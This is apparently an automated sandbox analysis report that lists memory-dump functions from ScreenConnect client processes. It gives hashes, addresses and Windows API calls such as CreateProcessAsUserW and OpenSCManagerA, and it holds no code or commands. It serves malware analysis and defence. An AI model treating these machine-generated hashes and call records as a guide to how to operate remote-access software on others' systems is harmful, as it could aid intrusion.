Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdaa265d7b78026e1ad5971786af51637c3a60e8308292033348e90e83a6170d
Instruction ID: e5d14028856cbd59bfd27d8b1cbc3c97fbc6baf21b08b1a40d4996393a3fe336
Opcode Fuzzy Hash: fdaa265d7b78026e1ad5971786af51637c3a60e8308292033348e90e83a6170d
Instruction Fuzzy Hash: C5E09234A05324CFC3456B70D50C5987BE1FF4636134140A9D40ECB661DB358C42DF82

Function 00FC1DF8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d16729a333d98632e84a70ddf0a34005c222bc947c968e543c4952ea997c38b
Instruction ID: 791300b8da3ab3d0a6c68e7119ff6fe0a911adc7ae9ebf7e211812ee4dfc3d5f
Opcode Fuzzy Hash: 5d16729a333d98632e84a70ddf0a34005c222bc947c968e543c4952ea997c38b
Instruction Fuzzy Hash: FDE02230906346DFC700EB78ED425987BF0EF0130030048CED108DB541D6340E098B01

Function 00FC13D1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724747b47bbc889ab5ac29f69d379accb98e67568c57252de38dbcf3e030efd9
Instruction ID: 28cdcfd612bcb0d6d8a942223352b30a1df7437041c7f1ee921767b25dff6f3a
Opcode Fuzzy Hash: 724747b47bbc889ab5ac29f69d379accb98e67568c57252de38dbcf3e030efd9
Instruction Fuzzy Hash: ABE0D83120C7A28FC316E738F4412DD7FE1AFC1324B05499DD0418F556DAA46D0A8796

Function 00FC1DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92f5f440967f15afd6e58fbd20a54a4cbeaf6d6e21eb7c21d5aad186918ecfa
Instruction ID: 01f0c97ed5555ba4eed074d52e94369c6ac4709d1ec29f385c386d24ae0fd5c7
Opcode Fuzzy Hash: a92f5f440967f15afd6e58fbd20a54a4cbeaf6d6e21eb7c21d5aad186918ecfa
Instruction Fuzzy Hash: 91E08636300118574205677DF80C46E7BAAEBC9661310852AE51EC3390CF748C4297E1

Function 00FC0838 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d94636451f816257dabfd08faed1b8975d5cf45e6694c4ac272885be1789d0
Instruction ID: 3862ca02fdf2f5f866d53fe7cda09698fc1672b45a9145b0292907a68e064f62
Opcode Fuzzy Hash: 25d94636451f816257dabfd08faed1b8975d5cf45e6694c4ac272885be1789d0
Instruction Fuzzy Hash: F3E06D30905305DFCB41DFB4DA411987BF0EF4530471001DED4189B212DB741E12AB51

Function 00FC8120 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d36a9b142681e1258bd74a130dce70f93ce042dee57a44f20ba64788f4e5af
Instruction ID: 75d6309fe029f8c5e13c6684746529acac1b51fc9e14fc5935c5e6540a481b23
Opcode Fuzzy Hash: c6d36a9b142681e1258bd74a130dce70f93ce042dee57a44f20ba64788f4e5af
Instruction Fuzzy Hash: ADE0DF308883928FC3418F68D4880D47FE0AB12334B48449ED5808E552D2399887CB53

Function 00FC7FB8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40f69b7b12c293ceb1eea54752212345a27f062c929f6961d9d958b5db8a17b
Instruction ID: 39857e120cefd4a661aa1e7ff4e786bf89ae2abda8fd7a56abb078c2e55271a2
Opcode Fuzzy Hash: a40f69b7b12c293ceb1eea54752212345a27f062c929f6961d9d958b5db8a17b
Instruction Fuzzy Hash: 82E0DF3008D3825FC3029B64D88A2C17FF0EB06320F0408AED4858E583D279A857CBA2

Function 00FC1310 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3038c4ed22f5ab22a06dd20c827132895901946fef3c277f5c83ba08fb713e5
Instruction ID: 003761ccb244dd1688b22731f3a475f1bb0c269de83b4abe973ac06455ef1cc2
Opcode Fuzzy Hash: f3038c4ed22f5ab22a06dd20c827132895901946fef3c277f5c83ba08fb713e5
Instruction Fuzzy Hash: F2E08670D04356DFC350CFB8C646549BFB0EB05364324C2DEC86D8F692D63684038B81

Function 00FC0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024dc6f27ba608b5ccf5fedd4518050cf28f89b67b0ce1b08a0dac9e0488d74e
Instruction ID: 4b54974c3de9fb3dfaecdc349c8135f3452c3268562d598a16989a2b55f7c99f
Opcode Fuzzy Hash: 024dc6f27ba608b5ccf5fedd4518050cf28f89b67b0ce1b08a0dac9e0488d74e
Instruction Fuzzy Hash: A2D01730A0120CFF8B00EFA8ED0555DBBF9EB44344B5041ADD40CE7201EE712F02AB81

Function 00FC1E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14d4f3abfae087b540ae51d45e1174af9772c46db1355eb89058738c6a508952
Instruction ID: 5748f0ab5346a43943008bd67b9f431b48ba80e2c635a988ede217ba57babb75
Opcode Fuzzy Hash: 14d4f3abfae087b540ae51d45e1174af9772c46db1355eb89058738c6a508952
Instruction Fuzzy Hash: D5D05E71A0120CEFCB40EFBDED4565DBBFAEB44204B1089ADE90DE7240EA356F049B90

Analysis Process: ScreenConnect.ClientService.exePID: 1672, Parent PID: 632COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.7%
Total number of Nodes:	31
Total number of Limit Nodes:	2

Executed Functions

Function 05C02180 Relevance: 1.6, APIs: 1, Instructions: 93
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C0224F

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 4e39dbb26a147fb334dbe00bce8241e3d14ea720960a7d2e8652b0729ecbdd3f
Instruction ID: 458aec7784c1db58f0acfa07156786d1461d761734d8ea47c38a8292fcaf4a73
Opcode Fuzzy Hash: 4e39dbb26a147fb334dbe00bce8241e3d14ea720960a7d2e8652b0729ecbdd3f
Instruction Fuzzy Hash: 1341F37690020ADFCF11CFA9C884ADEBBF5FF48320F15852AE918A7250D775AA55CF90

Function 062213F4 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.SECHOST(?,?,?), ref: 0622152B

Memory Dump Source

Source File: 00000008.00000002.2448475117.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6220000_ScreenConnect.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: fec4fce17844dcf3b979bd478d842d2fa95b5b30264c8fcdecd9298ecf9da1a2
Instruction ID: f0a787a2a2dc284a3d842800f4a8bdf9efce212ff587a0adf684c8e1e3ea60c7
Opcode Fuzzy Hash: fec4fce17844dcf3b979bd478d842d2fa95b5b30264c8fcdecd9298ecf9da1a2
Instruction Fuzzy Hash: B5515BB1D2026AAFDF54CFA8C885BAEBBF1FB08314F148529ED15A7284D7749491CB81

Function 06221400 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.SECHOST(?,?,?), ref: 0622152B

Memory Dump Source

Source File: 00000008.00000002.2448475117.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6220000_ScreenConnect.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a73f0eabe1c73fa602d3ae50a39fcb43a1d707ff3741cfc08d0286674cf9c80f
Instruction ID: 349f63ddceb81262ef41358da55fd8abb4071c1cc741c82327e193d0d472d3a0
Opcode Fuzzy Hash: a73f0eabe1c73fa602d3ae50a39fcb43a1d707ff3741cfc08d0286674cf9c80f
Instruction Fuzzy Hash: AF516C70D2026AAFDF54CFA8C885BAEBBF1FF08314F108529ED15A7280D7749491CB81

Function 05C0D730 Relevance: 1.6, APIs: 1, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C0DD2D

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1af534216435c5b494d79f602342f486cab72954288df5285131a639eaf70c7d
Instruction ID: e609c4f794ee6cd0a39db342dc9caa13b3feae67cf70058574b4c650f4d22106
Opcode Fuzzy Hash: 1af534216435c5b494d79f602342f486cab72954288df5285131a639eaf70c7d
Instruction Fuzzy Hash: 585155B1D003499FDB10CFA9C844B9EBBF2FB48314F149569E809AB291D7B99845CB91

Function 05C0DC04 Relevance: 1.6, APIs: 1, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C0DD2D

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cdcef443749a937c4f0e97d3b27bdc7bafb3ad03cd3376454d3db45cbd17c493
Instruction ID: 54fe9b6fb950e1a99bfbdae4b241fffd3b2da2021add39cea3b95b6da9c98308
Opcode Fuzzy Hash: cdcef443749a937c4f0e97d3b27bdc7bafb3ad03cd3376454d3db45cbd17c493
Instruction Fuzzy Hash: C25156B1D003499FDB10CFA9C844B9EBBF2FB48314F249529E809AB391D7B99845CF91

Function 05C02178 Relevance: 1.6, APIs: 1, Instructions: 95
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C0224F

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 01bba9dcd98f217a27918874dca6b8d7a94d936d459c522f1a5aa9c4e605f7b4
Instruction ID: 2edfa2fbd34e6e182ac06ee8ccc35fb7d7f9efa6f3ff789a162a3cbb235bab4e
Opcode Fuzzy Hash: 01bba9dcd98f217a27918874dca6b8d7a94d936d459c522f1a5aa9c4e605f7b4
Instruction Fuzzy Hash: 14411876900209DFCF10CFA9C884ADEBBF5FF48320F15852AE918A7250D775AA55CF90

Function 01D9FB40 Relevance: 1.6, Strings: 1, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 01D9FB83

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 370f15e8a2df86eade28859f65fe216b4e3b7da7d03e337aecb1a2ebddb26238
Instruction ID: 48159f33edca87f2f27bf62282dd3bff3c5577ce3caa8bcf388f6357ba79785a
Opcode Fuzzy Hash: 370f15e8a2df86eade28859f65fe216b4e3b7da7d03e337aecb1a2ebddb26238
Instruction Fuzzy Hash: C2D15C74A00719CFDB04DF68D894A99BBB2FF89310B518659E909AB365DB30FC85CF80

Function 05C04020 Relevance: 1.6, APIs: 1, Instructions: 61
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 05C0408F

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID:
API String ID: 3146367894-0
Opcode ID: b52961be90df24f581072e1c3c5fbb9f281321fca3bb7430958f2fc3e465ab0f
Instruction ID: 1e0e51078c4159a370249e1bb993eaa00e2ab322f5070cb0bb9ccc1982fdbeeb
Opcode Fuzzy Hash: b52961be90df24f581072e1c3c5fbb9f281321fca3bb7430958f2fc3e465ab0f
Instruction Fuzzy Hash: 882134B68002098FDB14CF9AC484BDFBBF4EB48224F10886ED559A7240D779A645CFA1

Function 05C04028 Relevance: 1.6, APIs: 1, Instructions: 56
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 05C0408F

Memory Dump Source

Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID:
API String ID: 3146367894-0
Opcode ID: 16fef8a26284c4a4de85fa039bbb492053f8b67b2f72e06f485b0b273753e924
Instruction ID: aaa1c9ae2e627240510d4d94d7437f43292342a92b538b22cc2f9c63f2f1315e
Opcode Fuzzy Hash: 16fef8a26284c4a4de85fa039bbb492053f8b67b2f72e06f485b0b273753e924
Instruction Fuzzy Hash: 4221F4B68002098FDB14CF9AC484BDEBBF4FB48324F14846ED559A7240C779A545CFA1

Function 01D96FE8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

(, xrefs: 01D970FE

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: 04460fccca045fa5944c825145cbae21eb4f6969f1956fc5f274a246cd3202b9
Instruction ID: 980d8e9f5766d08ce8482561a27e0263c36893c268cce4f0550fd8ff33b1bf51
Opcode Fuzzy Hash: 04460fccca045fa5944c825145cbae21eb4f6969f1956fc5f274a246cd3202b9
Instruction Fuzzy Hash: 5C31F231B002569BAF05EB7CA89046E7BE2FFC8250780852DD505EB344EF74ED059BD1

Function 01D96FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 01D970FE

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: 01152d3f1f47cee1917c497ca39733a1d95e7b39d5d6c108724f19409635af04
Instruction ID: 3426095b8ed65ef23d10bd0564d9894a4aed67938b573934eeb417af8f1f8e25
Opcode Fuzzy Hash: 01152d3f1f47cee1917c497ca39733a1d95e7b39d5d6c108724f19409635af04
Instruction Fuzzy Hash: 6D31BE31B002569BAF15EA6DA89046EBAE2FFC8250780852DD909EB344EF74FD059BD1

Function 01D9C67F Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8046c2900e0bf3120fbe89c691696962e4785863406831397a2f2fa94bb07c9
Instruction ID: ce135ea3bf997e66348dc1baecd2d59d3807ac85a348a1e6d3c3e116f32ca991
Opcode Fuzzy Hash: b8046c2900e0bf3120fbe89c691696962e4785863406831397a2f2fa94bb07c9
Instruction Fuzzy Hash: 9DB1A030A10359CFDF15DFA8C494AAEBBB1FF85304F10855AD446AB366DB74D986CB80

Function 01D9D078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da1202b6c88eb5e25128048a8fbe47e76b00aab927b57b1ccd0cd5e83fdfb6d
Instruction ID: bb5c9ac07d3b47bfba74e67b3fbfd8474f6e83ea075fba484730ac2a342fb09e
Opcode Fuzzy Hash: 2da1202b6c88eb5e25128048a8fbe47e76b00aab927b57b1ccd0cd5e83fdfb6d
Instruction Fuzzy Hash: ADA1D374A00609CFDB14DBA8C594AADBBF2BF89300F5481A9E906AB364DB71EC01DB50

Function 01D9D069 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c3d1671690bf3c592dd3d4f448d44366f9bf813ff734ff960f081ce0dc2653
Instruction ID: 3c9ba9bc2efdbcdef5500e8ab4049c1fb2b51868b8db921ff1d042275bdc1951
Opcode Fuzzy Hash: e7c3d1671690bf3c592dd3d4f448d44366f9bf813ff734ff960f081ce0dc2653
Instruction Fuzzy Hash: C7A1F574A00609CFDB14DFA8C594AAEBBF2FF89314B5041A9E906AB364DB71EC01DF50

Function 01D9EF78 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1420a217346f89590639313c10cbf7e1467d48ed7c6720427c9c721b99c20f9
Instruction ID: b04d75e99b3d2bea609a3de1ab13912bd12e189088899b77d280f4dab9d06fa3
Opcode Fuzzy Hash: b1420a217346f89590639313c10cbf7e1467d48ed7c6720427c9c721b99c20f9
Instruction Fuzzy Hash: BD616F31F002199BEB19EBB9C4907AEBAE6AFC8640F144529D406FB384DF34AD45CB91

Function 01D98D98 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c8827ce4ec553dd020b78055e1bc459411af82f9c91b831fa41d0a2eda6402
Instruction ID: 22a5a11fd0920111a88669e2727f72e6ce7f51ac525ca5fcfa613835ceb0f326
Opcode Fuzzy Hash: d0c8827ce4ec553dd020b78055e1bc459411af82f9c91b831fa41d0a2eda6402
Instruction Fuzzy Hash: 2961E534B10609DFDB14DF69D894AAEB7B2FF8E714B108169E606AB365DB30EC05DB40

Function 01D9E308 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93bb09ff5049c932b30c51b747b7b1d3c0d521e0ff9812fa9e692a96d072a29
Instruction ID: 1df94abc3849d046c4b09a5cf038cbed82e5fc65a6a2d3c89c1c99c85ecbf8d4
Opcode Fuzzy Hash: b93bb09ff5049c932b30c51b747b7b1d3c0d521e0ff9812fa9e692a96d072a29
Instruction Fuzzy Hash: E7515A34700205CFDB14DF6CD49496ABBE6FFD8214B148569E64ADB326EB70EC02DB90

Function 01D9E318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694901c8487a0ce5a68de54ed2308a9e3c8862850df9eecf4267bb3964c7137f
Instruction ID: 78e84db894715cdb5fc01349a7d560cc482e0c85cb3c8b71b42dc867b2ea4811
Opcode Fuzzy Hash: 694901c8487a0ce5a68de54ed2308a9e3c8862850df9eecf4267bb3964c7137f
Instruction Fuzzy Hash: 90514734700206CFDB14EFACD49496ABBE6FFD8214B548569E64ADB325EB70EC01DB90

Function 01D9C6F0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 237121add403299f3a32fc9709b28d8fee617c9f0315e0651d216f232a489211
Instruction ID: 9bb3bc994803089e4c9e457534b2c1b2139a7c6ad71227b504fd83af36468b55
Opcode Fuzzy Hash: 237121add403299f3a32fc9709b28d8fee617c9f0315e0651d216f232a489211
Instruction Fuzzy Hash: B6517030A1075ACFDF15DFA8C454AAEBBB2FF84300F118559D416AB365EB74E885CB80

Function 01D95DF0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c01fad6f11e2fa3d4ea693d18d95cf5b816b5ad8c2ca588c787657f53153ce6
Instruction ID: 8876435deb10e18a4182209e7bc079f37ac9c1570b5ad6cae7b1d66d0cddc937
Opcode Fuzzy Hash: 3c01fad6f11e2fa3d4ea693d18d95cf5b816b5ad8c2ca588c787657f53153ce6
Instruction Fuzzy Hash: 61517C317002068BDF15EF79E894A6EBBE2EF88250B50847AE506DB355EF75EC018B90

Function 01D95DE0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ecf1c2ef22d0450e1cc79a2b7eac8ddf045eefc9af6de84a14eb6d4b0d6cac1
Instruction ID: ed0163729cf144243a7654a908d278c02d34d178858911e4b49bddc25683fcfc
Opcode Fuzzy Hash: 6ecf1c2ef22d0450e1cc79a2b7eac8ddf045eefc9af6de84a14eb6d4b0d6cac1
Instruction Fuzzy Hash: 45519E317002068BDF15EF78E494A6E7BE2EF88210B50847AD506DB355EF75EC028B90

Function 01D984A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5464e3a8fe483248fa6033fd8a44144fbbb3ec0660e6e308cafc32926ffc47f1
Instruction ID: 0d4eb62eee693c1fe1380f158b1b81224b7e13013c77b41cd1c9ad7157235286
Opcode Fuzzy Hash: 5464e3a8fe483248fa6033fd8a44144fbbb3ec0660e6e308cafc32926ffc47f1
Instruction Fuzzy Hash: 8F510830600A05CFDB24DF29D484A5ABBF2FF8E724B244A5DD5969B7A4DB31F805DB40

Function 01D9B2D0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a583f2fd8a3d2b248b854cc625fc0d53b12ac66f02833af77a0db6bf19b7070
Instruction ID: 48191d6b70d774d8d9a35b1d94f47e2852c964392e5e22ccc01ec31499d07920
Opcode Fuzzy Hash: 6a583f2fd8a3d2b248b854cc625fc0d53b12ac66f02833af77a0db6bf19b7070
Instruction Fuzzy Hash: 34516530E00349DFDB01DFA8E854B9DBBB2FF89300F519659E505AB291EB74A895CF90

Function 01D9B2C0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8f8595c5f6bf0208491f5e07a730537e3926efcc03f1baa0a224e8e0a0cc36
Instruction ID: e37c9ff1cc137db1301162e07dcd4e86bc12a3a5fab0d0e287bbfbe1a4c78390
Opcode Fuzzy Hash: ef8f8595c5f6bf0208491f5e07a730537e3926efcc03f1baa0a224e8e0a0cc36
Instruction Fuzzy Hash: 69515630E002099FDB01DFA8D894BDDBBB2FF98300F519559E505BB291EB74A995CF90

Function 01D9DB98 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdea3684731a4e7ec6f4676836826ef2eaf59a0a7119bad80faebea029dceda9
Instruction ID: 2c08a8a9ed77c86f91d4ccee9240b6ba96410fba9c89a51b48b6aa8781f279ee
